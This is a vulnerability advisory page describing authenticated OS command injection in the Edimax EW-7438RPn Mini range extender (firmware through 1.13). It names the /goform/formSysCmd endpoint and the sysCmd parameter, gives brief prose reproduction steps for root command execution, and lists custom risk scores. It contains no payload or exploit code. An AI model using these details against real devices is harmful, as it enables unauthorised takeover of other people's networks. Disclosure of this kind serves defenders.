Volerion logoVolerion
Volerion logoVolerion

Edimax EW-7438RPn Mini OS Command Injection Vulnerability Allowing Remote Code Execution

Vulnerability

An OS command injection vulnerability has been identified in the Edimax EW-7438RPn Mini Wi-Fi range extender, specifically in firmware versions through 1.13. The vulnerability arises in the syscmd.asp form handler, where the /goform/formSysCmd endpoint allows remote authenticated attackers to execute arbitrary shell commands as the root user. Exploitation involves sending crafted commands through the sysCmd parameter, bypassing normal command execution restrictions.

Impact

Exploitation of this vulnerability allows for remote code execution on the affected device, with the executed commands running with root privileges.

Reproduction

To reproduce this vulnerability, authenticate to the device and navigate to the syscmd.asp page. Use the /goform/formSysCmd endpoint to submit a POST request with the sysCmd parameter containing the desired command. The command will be executed on the device's operating system with root privileges.

Added: Jun 20, 2025, 9:59 PM
Updated: Jun 20, 2025, 9:59 PM

Vulnerability Rating

Custom Algorithm
spread
0.3
impact
7.5
exploitability
6.2
remediation
7.7
relevance
0.2
threat
6.5
urgency
2.9
incentive
0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.